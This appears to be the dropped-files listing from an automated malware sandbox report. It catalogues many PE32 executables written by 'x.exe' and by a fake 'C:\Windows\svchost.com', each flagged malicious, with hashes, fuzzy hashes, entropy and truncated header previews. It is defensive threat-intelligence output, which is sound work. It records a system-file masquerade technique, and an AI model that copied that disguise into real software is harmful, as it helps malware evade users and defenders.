                                      SHA1:974C5E74E4D9CBEB1A1BFBA2348E13659578BC38
                                      SHA-256:7BEA8CDAEEEAB13F9E3C82D520AFD1C8F33A34B519D1FF6B62628DD5C3D9974C
                                      SHA-512:066195CBFFE4C2EE4D8E39D0C1D7F58A8E54388F22BFF619CCC0E1CD2BCF350A8D81D254C6045F6506EC33F3CB7ACE2C3CA7E77DD05DD05AD6B18F87BB457359
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):182712
                                      Entropy (8bit):6.321044292407141
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC3DbGpEPwVH+lMCNy0GEVVS1ikLrDdevXqHai8MBEL4:Pu3XSSwVgvfkhvzHcWEM
                                      MD5:D6A43031983F75E73D90D8F8F6EE65F3
                                      SHA1:891DE44CFCE6AC6BC790C766971D94872E8A5073
                                      SHA-256:28BDD891C54357A87F38A2BF6705BC1B2B6989B5BD3BF4CA750829FBD7FA2B51
                                      SHA-512:0A96059DE916DC162D297D78AC26B8FAB136E475E2A622CF736E84FCEFAE57C2861D24121E6B87FA70F25401BC8870BB9F2434DFFF77B70E396AE3775DDB2416
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):5215832
                                      Entropy (8bit):7.2575341874723645
                                      Encrypted:false
                                      SSDEEP:49152:v/xFnOvtaWIDn0apLKkLJU9nU2foKhA4vSWidGHp+NDGQUzbpDOfjxAkrQKl+RPi:RtLK3BDhtvS0Hpe4zbpaAKQkroGI
                                      MD5:B9466BCCAA9D0EA372B6DC9695C50293
                                      SHA1:A4A5A9F9E2DDC3920BA5573170FED2A128C02856
                                      SHA-256:918A5C4FC2B4AAC31AEAC084A104B3F7A41B32BE006F8F2B6DFC2886036FDB2D
                                      SHA-512:4F465FD01A875C58FBF9C52ED15133E9EAC5917E35077ABF7C537977D3EE4B3F583B34BFF7B06CBBE68D884052620AA3CA0DE182CEBBC3A34B93AD3C7A393289
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):139712
                                      Entropy (8bit):6.519874180004667
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCGU5adWAKmzUccnzkVBgEuKjj0WWtPPoI:Put+EjzCg+j6P3
                                      MD5:7939D58529E97846AD3CE93D63C2778B
                                      SHA1:36E2D3DAF36C2D0208971A66DAA273B627D43D9E
                                      SHA-256:131DB672352CDE0AB0154F4E5EE0FD28F93494F5D35FE9572BE2C6BE29467838
                                      SHA-512:05D79A0F03D4087C970B5E4EA7B08AFAA3C86EB8B8CB4E5F3658DB71CC2DAD969351A1B37FF5384513132846B7B9F022AA5863D02245FBDBE32E4609E3729C9E
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):380368
                                      Entropy (8bit):6.674833575620702
                                      Encrypted:false
                                      SSDEEP:6144:PulzgSb/029S2P/7nzGxFrRN0r0ivCZci1FXiO8DaS4wwE0CBlFJmcx:Xw/2q/roN7ivCZci1FC74wdBlFYU
                                      MD5:10DAF38B33648DB8EC4CAF569EFB8325
                                      SHA1:D226C4CB3EAC2BBB40C7070DF3360DA6087EF85D
                                      SHA-256:3ED456CAFC1F681A4823411C4F931DB89A14DD1F4C439814E3C69780F489FB33
                                      SHA-512:8D0975F6C992DEA085532A41B8542D44CBA540DF7BABF1F81E1EF5A5CFA2CCBA010264B2E96F92CFBFF0A8EEEF18BA90CEC3A0639999FBEBF98EFC4188BD24DC
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1269696
                                      Entropy (8bit):3.7496395278811394
                                      Encrypted:false
                                      SSDEEP:6144:PuTvk8/0NhFYAddenZhUhTNnLUrh+9nTGLljX4wuSzVF:C4wXF
                                      MD5:622DF9CBD4454B7D31D93A8FF26986A7
                                      SHA1:D9B343BDE5D6038757BD9D3FC3A1DB5D44FCC406
                                      SHA-256:1BC8B5224D1EC7C1A84FE6BE3D1FC2584C4407F4776BE701311B5F59CC6B2F72
                                      SHA-512:CB62A86DF9A944F1BA87FEB86CCBB4C8FE34518F5701B513FC0C837E37E9E0F3D2BCB392FAC866C30D6AED8DFF4B65789134FDFA21B62A049FA701C2BBD86272
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):266648
                                      Entropy (8bit):4.185481008908313
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCyRaCAd1uhNRuiazvhzpwtWhz7I3EWwwrwYx6RPWdn6ysl4a:zr8WDrCgezzvhF1h3wEWwwbx6ksl4D
                                      MD5:63852098CCC25D5425C739E6CAD65F4E
                                      SHA1:DE0C1A4DCA860867D769B155909B5B26323FE00E
                                      SHA-256:1DF1BE777988330F8D3E437175CA8B9D1CF4AB2C6328EA700013A5A0D766715A
                                      SHA-512:E6893FD4B8D212754383C86CF493242C8A15408742FF6DBD01A8B6B056EE6F6C359E6E87ABD63628FB54D3719B4C0C9731CA7712C7C78D0CDE7E1231BF814081
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):715760
                                      Entropy (8bit):6.522162821709477
                                      Encrypted:false
                                      SSDEEP:12288:U4tuuLntIMDXw5vde5EFf1Pmbd3lSz3dfp1Swf5M0blmFKuJOJZM30j3:7tFDKMg4iX3djfy0blmFlme303
                                      MD5:6F1E23677F89E09E3B4D7CBBFAA8E9D6
                                      SHA1:3BFA1C0F2AF97A85C282E141DD9E7D36D2466211
                                      SHA-256:CCACC1332115B620976CDB004CF6CFE426AD8CD008F8F0DED6D6F5CB71D8D8F1
                                      SHA-512:D7E6E401DECBF9989C51EE3F4BEE09F696BF25F13FD723AE7BFDDBFD7B7C2C21367D91289AFC4571B6EF34E541920A307F1F4A09F1680A97A2970E7D3412426A
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):619944
                                      Entropy (8bit):6.637875601699727
                                      Encrypted:false
                                      SSDEEP:12288:NM/Of/Bboj+clWnIKgrP6TFPLNWuX4Pemn3oi8ky9Q8WSe/aSqizuO1qukdQAPnQ:u8JgryFPLNWuX40RulAPn1OcnGVNfffl
                                      MD5:7A16124F85B72495EE1FE9F639B9231C
                                      SHA1:6BEC7715F9FBA90EA72176E9211A7D2B66CD2711
                                      SHA-256:6EC71D7BD6697603174EF482893A6AB891B7C056F407AB7071C4C05B905D3360
                                      SHA-512:55B7DE7FF27C529E2A13E37C8A5973592865D19FF493F01C6413F6D2921EB08A6225614A9B1A0CF9701397EFF8917C1DB84C3789A915FBDBDC0ACF9BC63ABA17
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):150416
                                      Entropy (8bit):6.494866167569868
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCsQPtLW7twRxI5mc5TNN3AsdVgNwihwT3RqEM6ZOfHXb42:PusQMzhdV0nh4Hof7
                                      MD5:B09DEFF61F6F9FE863E15CCEDDC41BD3
                                      SHA1:A0E6EF8B3C816C2D588E9E77D08B96D3D0CB097D
                                      SHA-256:2009879148C3ED6E84842B5B6FADE5C90796432F9661AEAB1F984707131A8421
                                      SHA-512:08009C92E6B4E652CD6516DCE9A4E88329A7A95C8F423C224FB15B983F1F3E8B239C7FDCAF0A567DE409756B1F813099DF1F5EA26B1B1D6B66D852A2716DE79E
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):264576
                                      Entropy (8bit):6.638841934755568
                                      Encrypted:false
                                      SSDEEP:6144:Pug872jsLuLnPo2TTHswP2TGz3FUCHySYI:/+2jsLuT3MfTGW5I
                                      MD5:E62A03187D8ED6B506E1D2B2273F2E0A
                                      SHA1:4579EAD2B0EF021621D994D6CF7CEB0FB1C4D03B
                                      SHA-256:B23D2592ECF09B750E142995632EA34F39F835664B728EA5A719C4734403A6FD
                                      SHA-512:0EF9AF76CA2A09FB8DF0C709881E496D19A35767DBA00817F9190FFCA263591462ABB3CAFF0DDC5AF4578344E0DF10DCF3910CA7CAC8F5E360B556F0CC6EF414
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):149920
                                      Entropy (8bit):6.084594176200221
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCWweqz1lezmtJwzojsKyyJFGgHZ//rHzbJOxqjQ+P04wsZLC:zr8WDrCSqzXe0wSyyJFD//Hb9r8WDrC
                                      MD5:4E2CD5ACF5D762E427BEB75640D7A224
                                      SHA1:0CCAA4DBBD6BD2176B763FB517391D480B699684
                                      SHA-256:443037E077141D002BC93EBC958348C7B1744F59A82C7579CA91A122D0C457B5
                                      SHA-512:E9106F34A7269A317CC3DCDD06ADC2BFF7E20270D9D4DDB7D4D4E4282367C956FC0577F6791CF516AC2CB28502A1B27B520AAA1502EBCC9DA30475788C236152
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):662600
                                      Entropy (8bit):5.99949921629127
                                      Encrypted:false
                                      SSDEEP:12288:hpo/FEVciSJJtH4PoR6moWEBfQLxZPhEx7xgtV2hv4tkYUK2tlIqR7lmNK/IKrtK:UFEWi4JtH4PoRfoFIxZPk0NKbB0R
                                      MD5:972F426D9B56B37005FDABC7D334747B
                                      SHA1:140458C19EDCD7C4B75586BB4DBA5930D5693DC5
                                      SHA-256:5052A0F40917AF50A319DD1BC4C39A62289A0723645AEF4A0DC8DBA0DF0391D9
                                      SHA-512:A4D3E9EC84C8111423CCD978081A2E95C268A177801F6B3E8F81965BE709F1F062C035A774BF9C7A706FAB67F988D3E88FC87E233C449D0179545A569EAC9DA8
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):260560
                                      Entropy (8bit):5.442716114061443
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCl4ZAh7ULoQdHBjw8Q2pFj4+W1ISYpksZmRohnonRBfTjzJEthEWV:PulPfQdhMuj4VM8imPjGthEWV
                                      MD5:1C9E01BBA5F422C56C9F336EB663411A
                                      SHA1:51AF077DD40C9407BBF10ECF3C8CBF438A0FE69F
                                      SHA-256:64397891801142AE1DADB7B7E7C9D72624BCE616EA76E21938ABFD415CF2BB54
                                      SHA-512:F1B54EFC6744DE37E2849B0B9E69551ADFA42E8E10B73FAA0409619BBC03C0D48077C103D055CB78EB8744EC2D621EA216BEA7E8376CC36C123954BB8A00573F
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4316200
                                      Entropy (8bit):3.92031883071557
                                      Encrypted:false
                                      SSDEEP:98304:TYN3nsBQ5ghvEyqf/whWovz9hRJ5RbisrbdsPO9jXsw:kN3nsBcghvEyqf/whxz9hRJ5Rbisrbdr
                                      MD5:4EDB603EF8AE8C97CDEDB9DD45B456FC
                                      SHA1:6916AD9547B437DA6AE9EA8243F6EB3645835406
                                      SHA-256:0EFCF2F2D3372AA05C67283CCCD02063AB8F4B60381598E71263B92C73B2E451
                                      SHA-512:55CB5D6B99A198B8A27943AD496BCDF8E07CE85A0E655957A8CFB87D2C184CFF10FC8F6EB7EABB470FD56C17B2C1D36931E16437ADE84A87F8CC46FE9DA8AF9D
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):124056
                                      Entropy (8bit):5.717272734704383
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCCwu7mzj9zNtP9zNps8Q:zr8WDrCCLmzj9P95psb
                                      MD5:69A2BD4BD404C78D413DAD66D32597C3
                                      SHA1:7663FEFC203E918AA0A6618A4548B273E4AA2893
                                      SHA-256:5AEAF364B4159E6603DCC5AC220765A83033E62679405C8141A4C209F89BDF6F
                                      SHA-512:913C45F67F749ECAC269FBCEBDDAB2A274F274DC7FE0376FEB92C8438493FC9B8B528C48962C27B05710C8D1B48E22300002A9D7075D8FD3DEA1680C0772E9B9
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):358336
                                      Entropy (8bit):4.510772603696019
                                      Encrypted:false
                                      SSDEEP:6144:PuEyUkKOEEIK128d2VKjw0EYsfZJnPmTuJjac2a51lHpLszc/kzY56Y:Rx/B/kib
                                      MD5:827D7E2C0648A1E8647744C90DDC13B1
                                      SHA1:94CF03EBCDEAECECF5A4438471AD452C8FBD1699
                                      SHA-256:AD4CE68BE5E3737235F7A3D3F6516B6EBF04209AA5BF2A1E929FA7FAB5F78460
                                      SHA-512:41C3A9FD99483B67E99E53BA7A706B6AD3F95268F09CE15932DB08CD42ECA01AFD6D05B5FBF2947A3BAE2D01EC9D629B9C269A5B67B34853FDB83FA40FC84581
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):763032
                                      Entropy (8bit):4.114589316949574
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCcwRnjnzhCiXXXXXX1AzZwAazTwdOLxN1IHO:PucwRnj7XXXXXXSzuz8OZ
                                      MD5:F898708BB5A98C216A5BDC4D8AB55F31
                                      SHA1:22F8606DFCC66EAA9348FCBE454AD077C1D6BD48
                                      SHA-256:9660432E007E774265D438B48100B8D6F0A98DC028D0208720FF7A76C72EA115
                                      SHA-512:2518C501205897BF611DD43A462AE4F689E1C1587BD2F5F15B33CDB63CFB367A402FB4BB61FFE7A7EC23AC564DA601060011AE6B82CDB8D2E565D14F7C72505F
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):895120
                                      Entropy (8bit):2.964304827256967
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCgfCEq7tOxIfMFzCEpAm/4rx7z1arf+9:PuJz8w
                                      MD5:02B9A3A76F77E057424B70187B54E8BE
                                      SHA1:3A659E76872EE3E20BA10F11D291D0BAC6EE0F66
                                      SHA-256:7B044969828A96DC142FFEDEB7922A876C4CC5CB4DC073C5CA47B868D7315C4B
                                      SHA-512:26D9CC3CA41BF1AA592A914DB7BDC82D7761962D7AECA6BDFC38047B39D6E1081484B5A90C009DE01D41F9CA45E54570B15AF6F10BD7E9CFD985F42B3ACF6E6E
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):105440
                                      Entropy (8bit):6.077342901333925
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCqjhzxwKehzgt5t1D:zr8WDrCMhLehEthD
                                      MD5:3041D08F176DA6C15446B54A11BA7772
                                      SHA1:474A99A64B75751BBD04B10E7F7F2D9D43F12E6E
                                      SHA-256:3E6EB6EE327A6054BA3BE5F55F3481FE3436AB3CF0F0D6FE99976472CDD02631
                                      SHA-512:216E38ACBCAC94F24144566415DFB6EBC94A16E93B44E1F45B79D982523B8F4A6A2FC1AD5843C336998D30F2EBD39ACE559F93EAD1AEE696A81032CB5641202D
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):537536
                                      Entropy (8bit):4.940165777929305
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCKPMMRMMMmMMMvMMMwMMMNMMMWMMM3MMsewVOOMzMMvMMOMMMJMM2MMQMe:PuJwVR6V7byjUWAZyVVdz8eEdGo
                                      MD5:AB9127D17FA9B572EC2BF5C8EE8BB7CD
                                      SHA1:D2096A5FB72A1E2DF9B21A13997BD4393BF7C84F
                                      SHA-256:4ED4B79EF07E11CD4D7AF823CC595686DD4ECF17FD3609B483AB1F5A466AF4EC
                                      SHA-512:8778F741473F139108DB40DD2897BA145C44C4B4EED110E0C8142361225FF6660875A668A65BC6A8EB5941C3DCF75719C7C0B1C6F64D0BCD37F4C443F2B2548C
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1271952
                                      Entropy (8bit):4.08276153361242
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCf3ppPpNpDpspp/pCp0pmppdpspppRppMpLp0ppppbpQp2pphpSpXpQppt:PuIKQSNdhnSzv
                                      MD5:4F7B544E82176A6591B213634C9DCBBC
                                      SHA1:EAB0382F33BD32FBF05351F750014EB814CDFC07
                                      SHA-256:3E8E1E8C74AC39D6663C089A3FADE84F9852F70325981F037E9CA111036448CA
                                      SHA-512:C339CC8DA7001494E3D2855632837408784412412630507E52A165AB42FCE29CF0D0115D3C3475ED231B2E4A14025464FC6DA85F4AD3227822B6855117D7C604
                                      Malicious:true
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4099760
                                      Entropy (8bit):3.71770959793901
                                      Encrypted:false
                                      SSDEEP:12288:+BKs7fvZIFpCYVIVN2mGsb8HtVLaHw3j4cLbUBRjLFP29DyZbT9gb/m06aCzE6h9:+BKszX0FjOeblHiled/k
                                      MD5:44D035172880CB494A431B5151307A85
                                      SHA1:F754A916F702B3A4AE738978E6CAF9ED103977F7
                                      SHA-256:60DBDA9BFE2A3A683DE925697F23962303AADA724144B70C50D5D4D915A73EDA
                                      SHA-512:1916ED72E59480F3585160231E3DCC459DCBFB3BBF126C7456A3135B9A08150A3B5512F5469CE7B60E2CFEAFD52B06157DA821367E83184CB2D54FE1BAF1D52C
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1273488
                                      Entropy (8bit):4.318016696735314
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrC56bZt+ATS583ONo4aezJ8ZfqiA:Pu56bZtazB
                                      MD5:8014D7B281477BA8D20CF01253894A75
                                      SHA1:847240AFA115E972C2115BF02965C89013BFEB8D
                                      SHA-256:D78C4FE0CB9E9552A8073F6F60F5CE2D1BC9306855FF52788B8DC542C62C56B0
                                      SHA-512:F66439985974204855DC81E3E43C9CECD19914DE11C72BB6EFD5CB0BC824198F0904ED5CC33975C45A02BDF0EABB979594B1A0CD793EF77A99C507CDB4F423F9
                                      Malicious:true
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):124056
                                      Entropy (8bit):5.717272734704383
                                      Encrypted:false
                                      SSDEEP:1536:yxqjQ+P04wsZLnDrCCwu7mzj9zNtP9zNps8Q:zr8WDrCCLmzj9P95psb
                                      MD5:69A2BD4BD404C78D413DAD66D32597C3
                                      SHA1:7663FEFC203E918AA0A6618A4548B273E4AA2893
                                      SHA-256:5AEAF364B4159E6603DCC5AC220765A83033E62679405C8141A4C209F89BDF6F
                                      SHA-512:913C45F67F749ECAC269FBCEBDDAB2A274F274DC7FE0376FEB92C8438493FC9B8B528C48962C27B05710C8D1B48E22300002A9D7075D8FD3DEA1680C0772E9B9
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:modified
                                      Size (bytes):2970664
                                      Entropy (8bit):3.852513127476973
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCbKd0qVmvzC1SvXKo3NzbsZ6DdIAZcbEcofUnpfRII8Lp9qgN3WJp0Rf5F:PuO/V/CfDhNG5sMXjjzmEPoL
                                      MD5:7AF0A120B754A36602AC1A7F2B3C66D1
                                      SHA1:D7870589638553E4D6DDD2E96F47CE3257CA4386
                                      SHA-256:548A4FDDCBEEF643B1CEA7FEA80E10EF7A98342223AA0D03E2D3F0E090732FA3
                                      SHA-512:9673C807E0C42B9C96E7A2EDE5B905E113B1C3A9C082FEB06AF7AA507238F35B4A376DCDB78711AB59A71845AA85C8B6A0ACEC24FF1EA0C08D0DA5AAAE1A5851
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):3531712
                                      Entropy (8bit):3.7796637413670093
                                      Encrypted:false
                                      SSDEEP:6144:Pu8sSR7PYKzz38YwZItvsDu7DbDhRAUzHW:5PYmLWSDBy
                                      MD5:6DC25D566989B3C8B314D0A51CE264BB
                                      SHA1:91A91837034A68BC5327132381D4A060B96B80AC
                                      SHA-256:7B0D191A69BA4A30A5F9BA4914F61B4514B30507467858E595353E158E20B62C
                                      SHA-512:213F26AC7407CDC444968465B5F2153DBF4D0B1113ECFFC7CBD936BCD4D0F1B024C5EB294EB1630D986BC022726F622950B8187304385FB81CA234E0E6D6D9A4
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Users\user\Desktop\x.exe
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):4319272
                                      Entropy (8bit):3.812301874725472
                                      Encrypted:false
                                      SSDEEP:6144:PuEmRfvlTZY/C3ul0ywb/uXMo+YJ7M41zXLWIB:3+6M+595B
                                      MD5:FB10E76D72E74609F207999494FFEEC1
                                      SHA1:9AE189189878E6B4E84FC1EA6BD6CC861E25BD68
                                      SHA-256:1594E068581C29E6422B82053DC5D2F1E805E190E7B12F9EFE8BE6C2D6E8E4DA
                                      SHA-512:78F4F601BB7E5B5696B615B66F701DAF6DE2E984C19D502207A786D5E6784E5D3C7474D05EE282227EB19EDA91A5BCEF3698B0F02FB0630003BAF88AE75C2136
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
                                      Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*......x.............@..............................................@...........................P..d............................................................p......................................................CODE.....r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................
                                      Process:C:\Windows\svchost.com
                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):1082008
                                      Entropy (8bit):3.7732979147875136
                                      Encrypted:false
                                      SSDEEP:3072:zr8WDrCyo4TUawK1uT040i0ougmQmJDJnJ+20FxPlJPPSSfzZ9Ar9oN:Puv243xmQm59UtUSfz3
                                      MD5:9139C2A0B4A37763278B42FA33970AD6
                                      SHA1:4667B3983C739687FC50DF651F1633E1EC2DBCFF
                                      SHA-256:EF91D1E371D92DBCAA676684653EE1892F901D4365F922BD6BD5833B5CD0488F
                                      SHA-512:E5CE975D51D56CD5A2E4707E9E739CC68C1E297CFB030AADEB114FB61D57BC515759E3CFE89332C91F326E23EC49BE5453DDF9F6EDE550F55DCE3F8D3BF53BC5
                                      Malicious:true
